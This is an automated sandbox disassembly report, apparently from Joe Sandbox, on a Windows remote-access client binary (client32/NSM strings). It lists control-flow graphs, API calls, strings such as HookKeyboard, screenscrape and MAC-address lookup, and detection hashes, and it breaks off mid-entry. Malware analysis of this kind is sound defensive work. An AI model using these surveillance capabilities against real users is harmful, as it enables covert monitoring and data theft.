                                                                                        • String ID: SetupDiDestroyDeviceInfoList$SetupDiEnumDeviceInterfaces$SetupDiGetClassDevsA$SetupDiGetDeviceInterfaceDetailA$setupapi.dll
                                                                                        • API String ID: 3464732724-3340099623
                                                                                        • Opcode ID: f516254d0abd54e50715bca7ef5168f810df5caaca2cd717629c9093cd8c9f4a
                                                                                        • Instruction ID: 033bff87456eb4c9bd2d5bbaba34d7345019b106b940800e90953e4c12ebf53e
                                                                                        • Opcode Fuzzy Hash: f516254d0abd54e50715bca7ef5168f810df5caaca2cd717629c9093cd8c9f4a
                                                                                        • Instruction Fuzzy Hash: F2816279E14259ABEB04DFF4EC84F9FFBB8AF48704F104528F921A6284EB759905CB50

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 2268 11133920-1113395c 2269 11133962-11133984 call 1105dd10 2268->2269 2270 11133c84-11133c9f call 11161d01 2268->2270 2269->2270 2275 1113398a-1113399e GetLocalTime 2269->2275 2276 111339c1-11133a43 LoadLibraryA call 110098c0 call 11015c30 GetCurrentProcess 2275->2276 2277 111339a0-111339bc call 11146450 2275->2277 2284 11133a45-11133a5b GetProcAddress 2276->2284 2285 11133a5d-11133a64 GetProcessHandleCount 2276->2285 2277->2276 2284->2285 2286 11133a66-11133a68 SetLastError 2284->2286 2287 11133a6e-11133a76 2285->2287 2286->2287 2288 11133a92-11133a9e 2287->2288 2289 11133a78-11133a90 GetProcAddress 2287->2289 2292 11133aa0-11133ab8 GetProcAddress 2288->2292 2293 11133aba-11133ac5 2288->2293 2289->2288 2290 11133ac7-11133ad2 SetLastError 2289->2290 2290->2292 2292->2293 2294 11133ad4-11133adc SetLastError 2292->2294 2295 11133adf-11133aef GetProcAddress 2293->2295 2294->2295 2297 11133af1-11133afd K32GetProcessMemoryInfo 2295->2297 2298 11133aff-11133b01 SetLastError 2295->2298 2299 11133b07-11133b15 2297->2299 2298->2299 2300 11133b23-11133b2e 2299->2300 2301 11133b17-11133b1f 2299->2301 2302 11133b30-11133b38 2300->2302 2303 11133b3c-11133b47 2300->2303 2301->2300 2302->2303 2304 11133b55-11133b5f 2303->2304 2305 11133b49-11133b51 2303->2305 2306 11133b61-11133b68 2304->2306 2307 11133b6a-11133b6d 2304->2307 2305->2304 2308 11133b6f-11133b7d call 11146450 2306->2308 2307->2308 2309 11133b80-11133b92 2307->2309 2308->2309 2313 11133c5a-11133c68 2309->2313 2314 11133b98-11133baa call 110637c0 2309->2314 2315 11133c6a-11133c6b FreeLibrary 2313->2315 2316 11133c6d-11133c75 2313->2316 2314->2313 2322 11133bb0-11133bd1 call 1105dd10 2314->2322 2315->2316 2318 11133c77-11133c78 FreeLibrary 2316->2318 2319 11133c7a-11133c7f 2316->2319 2318->2319 2319->2270 2321 11133c81-11133c82 FreeLibrary 2319->2321 2321->2270 2325 11133bd3-11133bd9 2322->2325 2326 11133bdf-11133bfb call 1105dd10 2322->2326 2325->2326 2327 11133bdb 2325->2327 2330 11133c06-11133c22 call 1105dd10 2326->2330 2331 11133bfd-11133c00 2326->2331 2327->2326 2335 11133c24-11133c27 2330->2335 2336 11133c2d-11133c49 call 1105dd10 2330->2336 2331->2330 2332 11133c02 2331->2332 2332->2330 2335->2336 2337 11133c29 2335->2337 2340 11133c50-11133c53 2336->2340 2341 11133c4b-11133c4e 2336->2341 2337->2336 2340->2313 2342 11133c55 call 11027780 2340->2342 2341->2340 2341->2342 2342->2313
                                                                                        APIs
                                                                                          • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                        • GetLocalTime.KERNEL32(?,_debug,CheckLeaks,00000001,00000000,461C6054), ref: 1113398E
                                                                                        • LoadLibraryA.KERNEL32(psapi.dll), ref: 111339E6
                                                                                        • GetCurrentProcess.KERNEL32 ref: 11133A27
                                                                                        • GetProcAddress.KERNEL32(?,GetProcessHandleCount), ref: 11133A51
                                                                                        • GetProcessHandleCount.KERNEL32(00000000,?), ref: 11133A62
                                                                                        • SetLastError.KERNEL32(00000078), ref: 11133A68
                                                                                        • GetProcAddress.KERNEL32(?,GetGuiResources), ref: 11133A84
                                                                                        • GetProcAddress.KERNEL32(?,GetGuiResources), ref: 11133AAC
                                                                                        • SetLastError.KERNEL32(00000078), ref: 11133AC9
                                                                                        • SetLastError.KERNEL32(00000078), ref: 11133AD6
                                                                                        • GetProcAddress.KERNEL32(?,GetProcessMemoryInfo), ref: 11133AE8
                                                                                        • K32GetProcessMemoryInfo.KERNEL32(?,?,00000028), ref: 11133AFB
                                                                                        • SetLastError.KERNEL32(00000078), ref: 11133B01
                                                                                        • FreeLibrary.KERNEL32(?), ref: 11133C6B
                                                                                        • FreeLibrary.KERNEL32(?), ref: 11133C78
                                                                                        • FreeLibrary.KERNEL32(?), ref: 11133C82
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AddressErrorLastLibraryProc$FreeProcess$CountCurrentHandleInfoLoadLocalMemoryTime__wcstoi64
                                                                                        • String ID: CheckLeaks$Client$Date=%04d-%02d-%02d$GetGuiResources$GetProcessHandleCount$GetProcessMemoryInfo$RestartGdiObj$RestartHandles$RestartMB$RestartUserObj$Used handles=%d, gdiObj=%d, userObj=%d, mem=%u kB$_debug$psapi.dll
                                                                                        • API String ID: 263027137-1001504656
                                                                                        • Opcode ID: 149598a2661f75f6a88bca6016e53709e6f8f2ae6bf4947ec8c9771d858cf79e
                                                                                        • Instruction ID: 17d7fdf42b282dadbb05295794651177f64ab9c07d211a437ec733fd2e53fcc2
                                                                                        • Opcode Fuzzy Hash: 149598a2661f75f6a88bca6016e53709e6f8f2ae6bf4947ec8c9771d858cf79e
                                                                                        • Instruction Fuzzy Hash: A3B1BFB1E242699FDB10DFE9CDC0AADFBB6EB48319F10452AE414E7348DB349844CB65

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 2344 1102dbc9 2345 1102dbd0-1102dbe1 2344->2345 2345->2345 2346 1102dbe3 2345->2346 2347 1102dd24-1102dd3d call 11142ac0 2346->2347 2350 1102dd43-1102dd45 2347->2350 2351 1102dbc0-1102dbc3 2347->2351 2352 1102de43-1102de5d call 111463d0 2350->2352 2353 1102dd4b-1102dd51 2350->2353 2354 1102dbc5-1102dbc7 2351->2354 2355 1102dbe8-1102dbf1 2351->2355 2377 1102deb3-1102debf call 1102b4f0 2352->2377 2378 1102de5f-1102de78 call 1105dd10 2352->2378 2357 1102dd53-1102dd62 call 11144dc0 2353->2357 2358 1102dd68-1102dd78 2353->2358 2354->2345 2355->2347 2359 1102dbf7-1102dbfe 2355->2359 2357->2358 2362 1102dd7a 2358->2362 2363 1102dd7f-1102dd9d call 1102cc10 2358->2363 2359->2347 2364 1102dcf3-1102dd08 call 11162de7 2359->2364 2365 1102dc05-1102dc07 2359->2365 2366 1102dd0a-1102dd1f call 11162de7 2359->2366 2367 1102dc9a-1102dccd call 111618c1 call 11142290 2359->2367 2368 1102dcdb-1102dcf1 call 11164010 2359->2368 2369 1102dc8b-1102dc95 2359->2369 2370 1102dccf-1102dcd9 2359->2370 2371 1102dc4c-1102dc52 2359->2371 2372 1102dc7c-1102dc86 2359->2372 2362->2363 2363->2352 2398 1102dda3-1102ddc8 call 110b7920 call 11146450 2363->2398 2364->2347 2365->2347 2376 1102dc0d-1102dc47 call 111618c1 call 11142290 call 1102cc10 2365->2376 2366->2347 2367->2347 2368->2347 2369->2347 2370->2347 2380 1102dc54-1102dc68 call 11162de7 2371->2380 2381 1102dc6d-1102dc77 2371->2381 2372->2347 2376->2347 2399 1102dec1-1102dec8 2377->2399 2400 1102de98-1102de9f 2377->2400 2378->2377 2403 1102de7a-1102de8c 2378->2403 2380->2347 2381->2347 2425 1102ddd3-1102ddd9 2398->2425 2426 1102ddca-1102ddd1 2398->2426 2405 1102dea5-1102dea8 2399->2405 2406 1102deca-1102ded4 2399->2406 2400->2405 2408 1102e0aa-1102e0cb GetComputerNameA 2400->2408 2403->2377 2423 1102de8e 2403->2423 2415 1102deaa-1102deb1 call 110b7920 2405->2415 2416 1102ded9 2405->2416 2406->2408 2413 1102e103-1102e109 2408->2413 2414 1102e0cd-1102e101 call 11027c30 2408->2414 2420 1102e10b-1102e110 2413->2420 2421 1102e13f-1102e152 call 11164010 2413->2421 2414->2413 2448 1102e157-1102e163 2414->2448 2419 1102dedc-1102dfb6 call 110278e0 call 11027be0 call 110278e0 * 2 LoadLibraryA GetProcAddress 2415->2419 2416->2419 2481 1102e07a-1102e082 SetLastError 2419->2481 2482 1102dfbc-1102dfd3 2419->2482 2431 1102e116-1102e11a 2420->2431 2444 1102e347-1102e36a 2421->2444 2423->2400 2432 1102dddb-1102dde2 call 11027d60 2425->2432 2433 1102de39 2425->2433 2426->2352 2436 1102e136-1102e138 2431->2436 2437 1102e11c-1102e11e 2431->2437 2432->2433 2451 1102dde4-1102de16 2432->2451 2433->2352 2442 1102e13b-1102e13d 2436->2442 2439 1102e132-1102e134 2437->2439 2440 1102e120-1102e126 2437->2440 2439->2442 2440->2436 2449 1102e128-1102e130 2440->2449 2442->2421 2442->2448 2457 1102e392-1102e39a 2444->2457 2458 1102e36c-1102e372 2444->2458 2453 1102e165-1102e17a call 110b7920 call 11029bd0 2448->2453 2454 1102e17c-1102e18f call 11081a70 2448->2454 2449->2431 2449->2439 2469 1102de20-1102de2f call 110f6080 2451->2469 2470 1102de18-1102de1e 2451->2470 2487 1102e1d3-1102e1ec call 11081a70 2453->2487 2467 1102e191-1102e1b4 2454->2467 2468 1102e1b6-1102e1b8 2454->2468 2463 1102e3ac-1102e438 call 111618c1 * 2 call 11146450 * 2 GetCurrentProcessId call 110eddd0 call 11027c90 call 11146450 call 11161d01 2457->2463 2464 1102e39c-1102e3a9 call 11035dd0 call 111618c1 2457->2464 2458->2457 2461 1102e374-1102e38d call 1102d330 2458->2461 2461->2457 2464->2463 2467->2487 2476 1102e1c0-1102e1d1 2468->2476 2478 1102de32-1102de34 call 1102d330 2469->2478 2470->2469 2470->2478 2476->2476 2476->2487 2478->2433 2485 1102e043-1102e04f 2481->2485 2482->2485 2501 1102dfd5-1102dfde 2482->2501 2495 1102e092-1102e0a1 2485->2495 2496 1102e051-1102e05d 2485->2496 2506 1102e1f2-1102e26d call 11146450 call 110cfc30 call 110d1480 call 110b7920 wsprintfA call 110b7920 wsprintfA 2487->2506 2507 1102e32c-1102e339 call 11164010 2487->2507 2495->2408 2499 1102e0a3-1102e0a4 FreeLibrary 2495->2499 2502 1102e06f-1102e073 2496->2502 2503 1102e05f-1102e06d GetProcAddress 2496->2503 2499->2408 2501->2485 2504 1102dfe0-1102e016 call 11146450 call 1112b270 2501->2504 2508 1102e084-1102e086 SetLastError 2502->2508 2509 1102e075-1102e078 2502->2509 2503->2502 2504->2485 2529 1102e018-1102e03e call 11146450 call 11027920 2504->2529 2544 1102e283-1102e299 call 11128ec0 2506->2544 2545 1102e26f-1102e27e call 11029450 2506->2545 2522 1102e33c-1102e341 CharUpperA 2507->2522 2510 1102e08c 2508->2510 2509->2510 2510->2495 2522->2444 2529->2485 2549 1102e2b2-1102e2ec call 110d0bd0 * 2 2544->2549 2550 1102e29b-1102e2ad call 110d0bd0 2544->2550 2545->2544 2557 1102e302-1102e32a call 11164010 call 110d07c0 2549->2557 2558 1102e2ee-1102e2fd call 11029450 2549->2558 2550->2549 2557->2522 2558->2557
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(Wtsapi32.dll,Client,screenscrape,00000001,00000003,TCPIP,ListenPort,00000000,00000003,00000003,?,?,?,?,?,?), ref: 1102DF31
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: LibraryLoad
                                                                                        • String ID: $14/03/16 10:38:31 V12.10F8$301389$Client$ClientName$DisableConsoleClient$Error x%x reading %s, sesh=%d$ListenPort$MacAddress$TCPIP$TSMode$Trying to get mac addr for %u.%u.%u.%u$WTSFreeMemory$WTSQuerySessionInformationA$Wtsapi32.dll$client32 dbi %hs$client32.ini$computername=%s, clientname=%s, tsmode=%d, vui=%d, vsvc=%d$multipoint=%d, softxpand=%d, pid=%d$screenscrape$ts macaddr=%s
                                                                                        • API String ID: 1029625771-1316599277
                                                                                        • Opcode ID: 167fae30edd779b3003cfba29f42c4e74eef6f814957872020123381032c8382
                                                                                        • Instruction ID: 8eab5b2d156e186679f92ce27f1e5cdd209b728942572a9b5b46018c3091c824
                                                                                        • Opcode Fuzzy Hash: 167fae30edd779b3003cfba29f42c4e74eef6f814957872020123381032c8382
                                                                                        • Instruction Fuzzy Hash: 97C1D275E0026AAFDF22DF959C84BEDF7B9AB44308F9440EDE55867280D770AE80CB51

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 2564 111414a0-111414e1 call 11146450 2567 111414e7-11141543 LoadLibraryA 2564->2567 2568 11141569-11141593 call 11142e80 call 11146ee0 LoadLibraryA 2564->2568 2569 11141545-11141550 call 11017450 2567->2569 2570 11141557-11141560 2567->2570 2579 11141595-1114159b 2568->2579 2580 111415c3 2568->2580 2569->2570 2578 11141552 call 110cc7f0 2569->2578 2570->2568 2573 11141562-11141563 FreeLibrary 2570->2573 2573->2568 2578->2570 2579->2580 2582 1114159d-111415a3 2579->2582 2583 111415cd-111415ed GetClassInfoExA 2580->2583 2582->2580 2584 111415a5-111415c1 call 1105dd10 2582->2584 2585 111415f3-1114161a call 11161d20 call 111444b0 2583->2585 2586 1114168e-111416e6 2583->2586 2584->2583 2595 11141633-11141675 call 111444b0 call 111444e0 LoadCursorA GetStockObject RegisterClassExA 2585->2595 2596 1114161c-11141630 call 11029450 2585->2596 2597 11141722-11141728 2586->2597 2598 111416e8-111416ee 2586->2598 2595->2586 2620 11141677-1114168b call 11029450 2595->2620 2596->2595 2600 11141764-11141786 call 1105dd10 2597->2600 2601 1114172a-11141739 call 1110f420 2597->2601 2598->2597 2603 111416f0-111416f6 2598->2603 2617 11141794-11141799 2600->2617 2618 11141788-11141792 2600->2618 2615 1114175d 2601->2615 2616 1114173b-1114175b 2601->2616 2603->2597 2608 111416f8-1114170f call 1112c830 LoadLibraryA 2603->2608 2608->2597 2619 11141711-1114171d GetProcAddress 2608->2619 2621 1114175f 2615->2621 2616->2621 2622 111417a5-111417ab 2617->2622 2623 1114179b 2617->2623 2618->2622 2619->2597 2620->2586 2621->2600 2624 111417ad-111417b3 call 110f7d00 2622->2624 2625 111417b8-111417d1 call 1113cd80 2622->2625 2623->2622 2624->2625 2632 111417d7-111417dd 2625->2632 2633 11141879-1114188a 2625->2633 2634 111417df-111417f1 call 1110f420 2632->2634 2635 11141819-1114181f 2632->2635 2646 111417f3-11141809 call 1115d6d0 2634->2646 2647 1114180b 2634->2647 2636 11141845-11141851 2635->2636 2637 11141821-11141827 2635->2637 2641 11141853-11141859 2636->2641 2642 11141868-11141873 #17 LoadLibraryA 2636->2642 2639 1114182e-11141840 SetTimer 2637->2639 2640 11141829 call 11134930 2637->2640 2639->2636 2640->2639 2641->2642 2645 1114185b-11141861 2641->2645 2642->2633 2645->2642 2649 11141863 call 1112d6a0 2645->2649 2648 1114180d-11141814 2646->2648 2647->2648 2648->2635 2649->2642
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(User32.dll,00000000,00000000), ref: 111414F3
                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 11141563
                                                                                        • LoadLibraryA.KERNEL32(imm32,?,?,00000000,00000000), ref: 11141586
                                                                                        • GetClassInfoExA.USER32(11000000,NSMWClass,?), ref: 111415E5
                                                                                        • _memset.LIBCMT ref: 111415F9
                                                                                        • LoadCursorA.USER32(00000000,00007F00), ref: 11141649
                                                                                        • GetStockObject.GDI32(00000000), ref: 11141653
                                                                                        • RegisterClassExA.USER32(?), ref: 1114166A
                                                                                        • LoadLibraryA.KERNEL32(pcihooks,?,?,00000000,00000000), ref: 11141702
                                                                                        • GetProcAddress.KERNEL32(00000000,HookKeyboard), ref: 11141717
                                                                                        • SetTimer.USER32(00000000,00000000,000003E8,1113CD60), ref: 1114183A
                                                                                        • #17.COMCTL32(?,?,?,00000000,00000000), ref: 11141868
                                                                                        • LoadLibraryA.KERNEL32(riched32.dll,?,?,?,00000000,00000000), ref: 11141873
                                                                                          • Part of subcall function 11017450: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,461C6054,1102FCB2,00000000), ref: 1101747E
                                                                                          • Part of subcall function 11017450: LoadLibraryA.KERNEL32(Kernel32.dll), ref: 1101748E
                                                                                          • Part of subcall function 11017450: GetProcAddress.KERNEL32(00000000,QueueUserWorkItem), ref: 110174D2
                                                                                          • Part of subcall function 11017450: FreeLibrary.KERNEL32(00000000), ref: 110174F8
                                                                                          • Part of subcall function 110CC7F0: CreateWindowExA.USER32(00000000,button,11194244,00000000,00000000,00000000,00000020,00000020,00000000,00000000,00000000,00000000), ref: 110CC829
                                                                                          • Part of subcall function 110CC7F0: SetClassLongA.USER32(00000000,000000E8,110CC570), ref: 110CC840
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Library$Load$Class$AddressCreateFreeProc$CursorEventInfoLongObjectRegisterStockTimerWindow_memset
                                                                                        • String ID: *quiet$HookKeyboard$InitUI (%d)$NSMGetAppIcon()$NSMWClass$TraceCopyData$UI.CPP$User32.dll$View$_License$_debug$imm32$pcihooks$riched32.dll
                                                                                        • API String ID: 3706574701-3145203681
                                                                                        • Opcode ID: 06b0d866844079945da73f67a6a0a82cb271ec245d7bf999d025821876dd0e90
                                                                                        • Instruction ID: 9b294397b9efa9119a6c3372e39ca87a41eafe2d9b680e3b49ce131b24699399
                                                                                        • Opcode Fuzzy Hash: 06b0d866844079945da73f67a6a0a82cb271ec245d7bf999d025821876dd0e90
                                                                                        • Instruction Fuzzy Hash: 6EA19DB4E0126AAFDB01DFE9C9C4AADFBB4FB4870DB60413EE52997644EB306440CB55

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 2653 6d1c63c0-6d1c6402 call 6d1e4710 EnterCriticalSection InterlockedDecrement 2656 6d1c65ed-6d1c6608 LeaveCriticalSection call 6d1e28e1 2653->2656 2657 6d1c6408-6d1c641f EnterCriticalSection 2653->2657 2659 6d1c64da-6d1c64e0 2657->2659 2660 6d1c6425-6d1c6431 2657->2660 2664 6d1c65bd-6d1c65e8 call 6d1e1c50 LeaveCriticalSection 2659->2664 2665 6d1c64e6-6d1c64f0 shutdown 2659->2665 2662 6d1c6443-6d1c6447 2660->2662 2663 6d1c6433-6d1c6441 GetProcAddress 2660->2663 2667 6d1c644e-6d1c6450 SetLastError 2662->2667 2668 6d1c6449-6d1c644c 2662->2668 2663->2662 2664->2656 2669 6d1c650a-6d1c652d timeGetTime #16 2665->2669 2670 6d1c64f2-6d1c6507 GetLastError call 6d1c30a0 2665->2670 2674 6d1c6456-6d1c6465 2667->2674 2668->2674 2671 6d1c656c-6d1c656e 2669->2671 2672 6d1c652f 2669->2672 2670->2669 2678 6d1c6570-6d1c657b closesocket 2671->2678 2676 6d1c6551-6d1c656a #16 2672->2676 2677 6d1c6531 2672->2677 2680 6d1c6477-6d1c647b 2674->2680 2681 6d1c6467-6d1c6475 GetProcAddress 2674->2681 2676->2671 2676->2672 2677->2676 2685 6d1c6533-6d1c653e GetLastError 2677->2685 2686 6d1c657d-6d1c658a WSAGetLastError 2678->2686 2687 6d1c65b6 2678->2687 2683 6d1c647d-6d1c6480 2680->2683 2684 6d1c6482-6d1c6484 SetLastError 2680->2684 2681->2680 2688 6d1c648a-6d1c6499 2683->2688 2684->2688 2685->2671 2689 6d1c6540-6d1c6547 timeGetTime 2685->2689 2690 6d1c658c-6d1c658e Sleep 2686->2690 2691 6d1c6594-6d1c6598 2686->2691 2687->2664 2693 6d1c64ab-6d1c64af 2688->2693 2694 6d1c649b-6d1c64a9 GetProcAddress 2688->2694 2689->2671 2695 6d1c6549-6d1c654b Sleep 2689->2695 2690->2691 2691->2678 2696 6d1c659a-6d1c659c 2691->2696 2697 6d1c64b1-6d1c64be 2693->2697 2698 6d1c64c3-6d1c64d5 SetLastError 2693->2698 2694->2693 2695->2676 2696->2687 2699 6d1c659e-6d1c65b3 GetLastError call 6d1c30a0 2696->2699 2697->2664 2698->2664 2699->2687
                                                                                        APIs
                                                                                        • EnterCriticalSection.KERNEL32(6D20B898,00000000,?,00000000,?,6D1CD77B,00000000), ref: 6D1C63E8
                                                                                        • InterlockedDecrement.KERNEL32(-0003F3B7), ref: 6D1C63FA
                                                                                        • EnterCriticalSection.KERNEL32(-0003F3CF,?,00000000,?,6D1CD77B,00000000), ref: 6D1C6412
                                                                                        • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 6D1C643B
                                                                                        • SetLastError.KERNEL32(00000078,?,00000000,?,6D1CD77B,00000000), ref: 6D1C6450
                                                                                        • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 6D1C646F
                                                                                        • SetLastError.KERNEL32(00000078,?,00000000,?,6D1CD77B,00000000), ref: 6D1C6484
                                                                                        • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 6D1C64A3
                                                                                        • SetLastError.KERNEL32(00000078,?,00000000,?,6D1CD77B,00000000), ref: 6D1C64C5
                                                                                        • shutdown.WSOCK32(?,00000001,?,00000000,?,6D1CD77B,00000000), ref: 6D1C64E9
                                                                                        • GetLastError.KERNEL32(?,00000001,?,00000000,?,6D1CD77B,00000000), ref: 6D1C64F2
                                                                                        • timeGetTime.WINMM(?,00000001,?,00000000,?,6D1CD77B,00000000), ref: 6D1C6510
                                                                                        • #16.WSOCK32(?,?,00001000,00000000,?,00000000,?,6D1CD77B,00000000), ref: 6D1C6526
                                                                                        • GetLastError.KERNEL32(?,?,00001000,00000000,?,00000000,?,6D1CD77B,00000000), ref: 6D1C6533
                                                                                        • timeGetTime.WINMM(?,00000000,?,6D1CD77B,00000000), ref: 6D1C6540
                                                                                        • Sleep.KERNEL32(00000001,?,00000000,?,6D1CD77B,00000000), ref: 6D1C654B
                                                                                        • #16.WSOCK32(?,?,00001000,00000000,?,?,00001000,00000000,?,00000000,?,6D1CD77B,00000000), ref: 6D1C6563
                                                                                        • closesocket.WSOCK32(?,?,?,00001000,00000000,?,00000000,?,6D1CD77B,00000000), ref: 6D1C6574
                                                                                        • WSAGetLastError.WSOCK32(?,?,?,00001000,00000000,?,00000000,?,6D1CD77B,00000000), ref: 6D1C657D
                                                                                        • Sleep.KERNEL32(00000032,?,?,?,00001000,00000000,?,00000000,?,6D1CD77B,00000000), ref: 6D1C658E
                                                                                        • GetLastError.KERNEL32(?,?,?,00001000,00000000,?,00000000,?,6D1CD77B,00000000), ref: 6D1C659E
                                                                                        • _memset.LIBCMT ref: 6D1C65C8
                                                                                        • LeaveCriticalSection.KERNEL32(?,?,6D1CD77B,00000000), ref: 6D1C65D7
                                                                                        • LeaveCriticalSection.KERNEL32(6D20B898,?,00000000,?,6D1CD77B,00000000), ref: 6D1C65F2
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3996192540.000000006D1C1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D1C0000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3996174063.000000006D1C0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3996225028.000000006D200000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3996243537.000000006D209000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3996265641.000000006D20A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3996265641.000000006D20E000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3996304118.000000006D210000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_6d1c0000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ErrorLast$CriticalSection$AddressProc$EnterLeaveSleepTimetime$DecrementInterlocked_memsetclosesocketshutdown
                                                                                        • String ID: CloseGatewayConnection - closesocket(%u) FAILED (%d)$CloseGatewayConnection - shutdown(%u) FAILED (%d)$InternetCloseHandle
                                                                                        • API String ID: 3764039262-2631155478
                                                                                        • Opcode ID: 8553bc6099e20886475e57441cfb7e1e8bd29e0dd43b802f9498621cef424bfe
                                                                                        • Instruction ID: 150a3aa511693e4381418a55aa98df18ccb6f1b7887317bda663e1d13aa651cb
